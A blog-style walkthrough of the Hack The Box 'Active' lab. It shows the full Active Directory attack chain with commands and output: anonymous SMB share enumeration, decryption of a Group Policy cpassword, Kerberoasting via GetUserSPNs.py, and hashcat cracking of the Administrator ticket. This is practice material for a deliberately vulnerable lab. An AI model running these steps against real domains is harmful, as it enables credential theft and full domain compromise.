DEV Community

Iftikhar Huseynov
Iftikhar Huseynov

Posted on

Active Ctf Hack The Box

Hi guys, what’s up. Welcome to my page. Today we are going to solve Active lab in HTB. The Active machine on Hack The Box focuses on Active Directory enumeration and privilege escalation. It introduces common techniques such as SMB enumeration, Kerberoasting, and exploiting misconfigured domain accounts. Solving this machine requires a solid understanding of Windows authentication and domain services. It is considered an excellent lab for practicing real-world Active Directory attack paths. Overall, Active is a great beginner-friendly machine for learning fundamental Windows penetration testing techniques.

Enumeration

nmap -sV -sC 10.129.31.130 

Starting Nmap 7.99 ( https://nmap.org ) at 2026-07-06 05:57 -0400
Stats: 0:00:01 elapsed; 0 hosts completed (0 up), 0 undergoing Script Pre-Scan
NSE Timing: About 0.00% done
Nmap scan report for 10.129.31.130
Host is up (0.25s latency).
Not shown: 981 closed tcp ports (reset)
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid: 
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2026-07-06 10:01:45Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
49152/tcp open  msrpc         Microsoft Windows RPC
49153/tcp open  msrpc         Microsoft Windows RPC
49154/tcp open  msrpc         Microsoft Windows RPC
49155/tcp open  msrpc         Microsoft Windows RPC
49157/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc         Microsoft Windows RPC
49165/tcp open  msrpc         Microsoft Windows RPC
49167/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   2.1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2026-07-06T10:02:46
Enter fullscreen mode Exit fullscreen mode

53,88,135,389,445 ports are open.

SMB enumeration
We can use msfconsole auxiliary module for enumerating shares.

msfconsole -q
msf > search name:smb type:auxiliary

msf auxiliary(scanner/smb/smb_enumshares) > run
[-] 10.129.31.130:139 - Login Failed: Unable to negotiate SMB1 with the remote host: Not a valid SMB packet
[!] 10.129.31.130:445 - peer_native_os is only available with SMB1 (current version: SMB2)
[!] 10.129.31.130:445 - peer_native_lm is only available with SMB1 (current version: SMB2)
/usr/share/metasploit-framework/vendor/bundle/ruby/3.3.0/gems/recog-3.1.29/lib/recog/fingerprint/regexp_factory.rb:34: warning: nested repeat operator '+' and '?' was replaced with '*' in regular expression
[+] 10.129.31.130:445 - ADMIN$ - (DISK|SPECIAL) Remote Admin
[+] 10.129.31.130:445 - C$ - (DISK|SPECIAL) Default share
[+] 10.129.31.130:445 - IPC$ - (IPC|SPECIAL) Remote IPC
[+] 10.129.31.130:445 - NETLOGON - (DISK) Logon server share 
[+] 10.129.31.130:445 - Replication - (DISK) 
[+] 10.129.31.130:445 - SYSVOL - (DISK) Logon server share 
[+] 10.129.31.130:445 - Users - (DISK) 
[*] 10.129.31.130: - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Enter fullscreen mode Exit fullscreen mode

7 shares we have. After check we have anonymous read permission on Replication shares.

Inside the replication shares we should inspect the contents to determine whether there are any potentially sensitive or interesting files present.

smbclient //10.129.31.130/Replication -U “”%””

smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\> get groups.xml -
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb

Enter fullscreen mode Exit fullscreen mode

There are groups.xml files which is stored credentials inside.

Cracking the hash

Gpp-decrypt can solve

gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
Enter fullscreen mode Exit fullscreen mode

User Flag
We found SVC_TGS ‘s password. So lets get in.

smbclient //10.129.31.130/Users -U SVC_TGS
smb: \SVC_TGS\> cd Desktop
smb: \SVC_TGS\Desktop\> ls
  .                                   D        0  Sat Jul 21 11:14:42 2018
  ..                                  D        0  Sat Jul 21 11:14:42 2018
  user.txt                           AR       34  Mon Jul  6 05:57:18 2026

                5217023 blocks of size 4096. 275658 blocks available
smb: \SVC_TGS\Desktop\> get user.txt -
*********
Enter fullscreen mode Exit fullscreen mode

Kerberosting

./kerbrute userenum -d active.htb --dc 10.129.31.130 /home/kali/Downloads/SecLists/Usernames/xato-net-10-million-usernames.txt

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.3 (9dad6e1) - 07/06/26 - Ronnie Flathers @ropnop

2026/07/06 06:12:38 >  Using KDC(s):
2026/07/06 06:12:38 >   10.129.31.130:88

2026/07/06 06:13:29 >  [+] VALID USERNAME:       administrator@active.htb
Enter fullscreen mode Exit fullscreen mode

Nothing.

Privilege Escalation
GetUserSPNs.py is an Impacket tool used to enumerate Service Principal Names (SPNs) in an Active Directory domain. With the -request option, it requests Kerberos service tickets (TGS) for service accounts, enabling Kerberoasting attacks by extracting ticket hashes for offline password cracking.

GetUserSPNs.py -request -dc-ip 10.129.31.130 active.htb/SVC_TGS -save -outputfile active.out

/usr/local/bin/GetUserSPNs.py:4: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  __import__('pkg_resources').run_script('impacket==0.14.0.dev0+20251120.95652.9c2d8b61', 'GetUserSPNs.py')
Impacket v0.14.0.dev0+20251120.95652.9c2d8b61 - Copyright Fortra, LLC and its affiliated companies 

Password:
ServicePrincipalName  Name           MemberOf                                                  PasswordLastSet             LastLogon                   Delegation 
--------------------  -------------  --------------------------------------------------------  --------------------------  --------------------------  ----------
active/CIFS:445       Administrator  CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb  2018-07-18 15:06:40.351723  2026-07-06 05:57:22.849416

Enter fullscreen mode Exit fullscreen mode

*Hash
*

hashcat -m 18200 GetUserSPNs.out /usr/share/wordlists/rockyou.txt — force

$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$5158803791e7e090b15c7b17a883f1cf$2ca8851927cb8c16c1a1e444ccc89dd7f059644e2a22ac5a70ff32bb905167c58084d960659d37df47db978aa7e71f5604bd8d61cb2db35cb40e65d485ff63068270bee0cbd088d34d5f195b4c0b069fce0507a4212604ef64b372a5b05bdffd00a7b8725a781d4cb1eea039930e7fd3a4ec49369c55ac951f02af6940d8b060b1785252182a1c5e9b69b96883a25d1a9edd6552798bc115dd6412cde5507571cf2cc5833fba4671660a9048613c5b5ea0aa5455b1f2ab40f1bfde3b3fa6022a2c18e1a9e2f4d187d06656016c681ac91642402d3daa9e98e81775395318c05e1b63b97e31c3e5a82a9f7540a4e8284f171b319ceeef5281d6a5aaa70e703aad93ca2d1dd5ef6e2986769c3732259e81a5d09cd27c7db57d424c2c2061091122478bc27bc691cf1cbc1c091de37beacfbd5670eb5df2d3ca6a3fd21d43421e803e857caaf231aefceac6b144356c50f159d31cacc7b4a6367801baac3b65a795716507e9ca79176823c45a9517e17f261c21e59825eea4431ab3fc42953b3773e41d2686015aefd1a16708910ab70193e08b617d7b003bf63e575e431b20d4742e781532adf1e4b24549019007727ca6d5681df580ae33f2ae1c0d628968243fe1a52fc10e5b3fbc7e378bd3b5f4950a6ab973053baba84930312c76c083acf3bc4bb0cd31f082b2032fe255bc402c35408de18eb77857f27f882fc17f3d4b447f354f0e75e262764724de5881fb902ddce6c88c974bad0e423290bed826d567a0289521a5477b7b6a5349c87261b84de3e607ec7a4e3a6b429020125a514a18853efaa80b2e0149b098025c1a8dae792a2ada5e55d353c7f264e923b3fa8b8d1ca5e255f6cc8a6c8df9a1011900f7a2cf1584db8fe9ef2d9b6b35fae10a5e30d162db9b425408efcf6ce696ed0137fa43098ac1193a11bfbef6597062fe4dbc388ec9a10cd7eef44fd433a0ba6c7adefb0ab8dc360868ea09557c1681efd75ab3173265a4ef735a667f1f5fc8661a8458a2120028769bbfb40a61d0d10ad3e8670de04e807010d6c54110cc91d6261302974fdec509ffa5ae61078fd8dad91ed70c630687d8bd2b14f7f5a1d28e019f6bc4dd59138d6683f454fae9901481f1bfd6577c74ddba2dfdbd9658088ee12b5a0c3c03b8bfc37fad05aa289f7b410f086c353a48d604c1a5ad0d1ae9e9461dfbd19127eb5ee661b4eeeda9ab440d16a806782b5321057fcea6ac2cf77fe3967f7c0209772be2b80e2a:*******

Enter fullscreen mode Exit fullscreen mode

Root Flag
We got administrator’s password.

smbclient //10.129.31.130/Users -U Administrator
smb: \Administrator\> cd Desktop
smb: \Administrator\Desktop\> ls
  .                                  DR        0  Thu Jan 21 11:49:47 2021
  ..                                 DR        0  Thu Jan 21 11:49:47 2021
  desktop.ini                       AHS      282  Mon Jul 30 09:50:10 2018
  root.txt                           AR       34  Mon Jul  6 05:57:18 2026

                5217023 blocks of size 4096. 279206 blocks available
smb: \Administrator\Desktop\> get root.txt -

Enter fullscreen mode Exit fullscreen mode

Stay safe. Goodbye

Top comments (0)